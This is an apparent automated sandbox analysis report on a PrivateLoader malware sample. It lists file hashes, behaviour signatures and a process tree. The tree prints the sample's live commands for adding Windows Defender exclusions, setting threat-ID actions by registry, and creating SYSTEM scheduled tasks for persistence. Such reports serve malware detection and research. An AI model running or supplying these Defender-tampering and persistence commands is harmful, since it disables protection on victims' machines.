Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-05-2024 09:34

General

  • Target

    803af90de603592cfdca6c9b6a8ffc39130a54dee552f0758f7ebf07ab327fc5.exe

  • Size

    1.8MB

  • MD5

    ce3ad5b4ca386cfb4b47daf322441283

  • SHA1

    85da5dabe5797323057aca3d1a2bb66a4d75ee81

  • SHA256

    803af90de603592cfdca6c9b6a8ffc39130a54dee552f0758f7ebf07ab327fc5

  • SHA512

    feb11585efaa97a51aec5722b002cf6edc686ce45eb211be874056d8b40940eb19d23d4ef761fc65f1b08e09599a7c881b9f3d6c58fead4fde1364df2b8bc9f7

  • SSDEEP

    24576:HynjN3fi9dEoZR814OEQjls30eTFxmT4i8eMOq52FOXuq01dKqOFUC:SjN3CdJ81nEQhs30evuqsrOFUC

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 37 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\803af90de603592cfdca6c9b6a8ffc39130a54dee552f0758f7ebf07ab327fc5.exe
    "C:\Users\Admin\AppData\Local\Temp\803af90de603592cfdca6c9b6a8ffc39130a54dee552f0758f7ebf07ab327fc5.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4668
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Users\Admin\Pictures\Ushi33UGUMybhrVQlpopcugE.exe
        "C:\Users\Admin\Pictures\Ushi33UGUMybhrVQlpopcugE.exe" /s
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4840
        • C:\Users\Admin\Pictures\360TS_Setup.exe
          "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • Suspicious use of SetWindowsHookEx
          PID:1644
          • C:\Program Files (x86)\1716543391_0\360TS_Setup.exe
            "C:\Program Files (x86)\1716543391_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Writes to the Master Boot Record (MBR)
            • Drops file in Program Files directory
            • Suspicious use of SetWindowsHookEx
            PID:3628
      • C:\Users\Admin\Pictures\ZCqkseaCPOP1T1rtmVFiyo8b.exe
        "C:\Users\Admin\Pictures\ZCqkseaCPOP1T1rtmVFiyo8b.exe"
        3⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:568
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 384
          4⤵
          • Program crash
          PID:4480
      • C:\Users\Admin\Pictures\fXgESkJ0Hee5mygWtblhJChy.exe
        "C:\Users\Admin\Pictures\fXgESkJ0Hee5mygWtblhJChy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1428
        • C:\Users\Admin\AppData\Local\Temp\7zSA46E.tmp\Install.exe
          .\Install.exe /odidum "385118" /S
          4⤵
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Enumerates system info in registry
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2716
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3196
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  8⤵
                    PID:2832
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1908
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1688
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    8⤵
                      PID:2064
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3344
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2324
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      8⤵
                        PID:2052
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3972
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2172
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        8⤵
                          PID:240
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      6⤵
                        PID:3376
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          7⤵
                            PID:2664
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              8⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1968
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                9⤵
                                  PID:932
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                          5⤵
                            PID:3948
                            • C:\Windows\SysWOW64\cmd.exe
                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              6⤵
                                PID:3028
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:656
                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    8⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1632
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSA46E.tmp\Install.exe\" it /wAAdidZtlQ 385118 /S" /V1 /F
                              5⤵
                              • Drops file in Windows directory
                              • Creates scheduled task(s)
                              PID:916
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                              5⤵
                                PID:4236
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                  6⤵
                                    PID:2412
                                    • \??\c:\windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                      7⤵
                                        PID:4408
                              • C:\Users\Admin\Pictures\8IcUW2EihPSxs6OIadtbOxRb.exe
                                "C:\Users\Admin\Pictures\8IcUW2EihPSxs6OIadtbOxRb.exe"
                                3⤵
                                • Modifies firewall policy service
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Drops file in System32 directory
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:3756
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 568 -ip 568
                            1⤵
                              PID:1044
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                              1⤵
                                PID:4584
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                1⤵
                                  PID:4588
                                • C:\Users\Admin\AppData\Local\Temp\7zSA46E.tmp\Install.exe
                                  C:\Users\Admin\AppData\Local\Temp\7zSA46E.tmp\Install.exe it /wAAdidZtlQ 385118 /S
                                  1⤵
                                  • Executes dropped EXE
                                  • Drops desktop.ini file(s)
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:4556
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    2⤵
                                      PID:568
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                        3⤵
                                          PID:3388
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            4⤵
                                              PID:1800
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                5⤵
                                                  PID:4240
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              3⤵
                                                PID:1656
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  4⤵
                                                    PID:3012
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:2816
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                    3⤵
                                                      PID:2832
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        4⤵
                                                          PID:3196
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            5⤵
                                                              PID:2716
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                          3⤵
                                                            PID:2168
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                              4⤵
                                                                PID:4776
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  5⤵
                                                                    PID:4476
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                3⤵
                                                                  PID:2052
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                    4⤵
                                                                      PID:2324
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        5⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3344
                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                          6⤵
                                                                            PID:1500
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                    2⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2176
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:3052
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                          4⤵
                                                                            PID:444
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:2564
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:4968
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:2452
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:3652
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:1464
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:2120
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:1900
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:964
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4208
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:4972
                                                                                            • C:\Windows\SysWOW64\reg.exe
